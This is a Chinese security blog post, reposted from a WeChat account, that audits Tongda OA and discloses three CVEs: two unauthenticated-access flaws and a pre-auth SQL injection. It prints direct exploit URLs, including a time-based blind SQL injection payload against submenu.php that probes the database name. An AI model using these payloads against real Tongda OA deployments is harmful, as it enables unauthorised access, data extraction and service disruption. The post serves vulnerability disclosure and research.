通达OA未授权访问、前台SQL注入审计

admin
admin
admin
138643
文章
114
评论
2024年11月4日10:04:11评论109 views字数 959阅读3分11秒阅读模式
声明:本文仅用于网络安全相关知识分享,环境为本机靶场,请严格遵守网络安全相关法律法规。
未经授权利用本文相关技术从事违法活动的,一切后果由违法人自行承担!Jie安全公众号及作者不承担任何法律责任。
CVE-2024-10598(未授权访问)
影响范围:v11.2-v11.6
经分析:inc/auth.inc.php为权限校验文件
通达OA未授权访问、前台SQL注入审计
通常都是包含inc/auth.inc.php判断是否已登录
通达OA未授权访问、前台SQL注入审计
general/hr/setting/attendance/leave/data.php未包含inc/auth.inc.php,存在未授权访问
通达OA未授权访问、前台SQL注入审计
该接口在general/hr/setting/attention/newLeave/add.html中被调用
通达OA未授权访问、前台SQL注入审计
直接打开:http://192.168.0.106/general/hr/setting/attendance/newLeave/add.html
可未授权修改年假休息时间 
通达OA未授权访问、前台SQL注入审计
通达OA未授权访问、前台SQL注入审计
也可未授权查看系统所有用户姓名
通达OA未授权访问、前台SQL注入审计
通达OA未授权访问、前台SQL注入审计
CVE-2024-10599(DDOS)
影响范围:v2017-v11.7
该漏洞也属于未授权访问,不过功能是打包文件,所以提了DDOS
通达OA未授权访问、前台SQL注入审计
直接打开:http://192.168.0.106/inc/package_static_resources.php
通达OA未授权访问、前台SQL注入审计
CVE-2024-10600(前台SQL注入)
影响范围:v2017-v11.6
pda/appcenter/submenu.php 未包含inc/auth.inc.php且 $appid 参数未用'包裹导致前台SQL注入
通达OA未授权访问、前台SQL注入审计
直接打开:http://192.168.0.106/pda/appcenter/submenu.php?appid=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)
是延时,别被响应页面骗了
通达OA未授权访问、前台SQL注入审计
其余一些后台注入就不赘述了,都写进了:https://github.com/LvZCh/td/issues
并获得了CVE编号
通达OA未授权访问、前台SQL注入审计
通达OA未授权访问、前台SQL注入审计

原文始发于微信公众号(Jie安全):通达OA未授权访问、前台SQL注入审计

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月4日10:04:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通达OA未授权访问、前台SQL注入审计https://cn-sec.com/archives/3351262.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息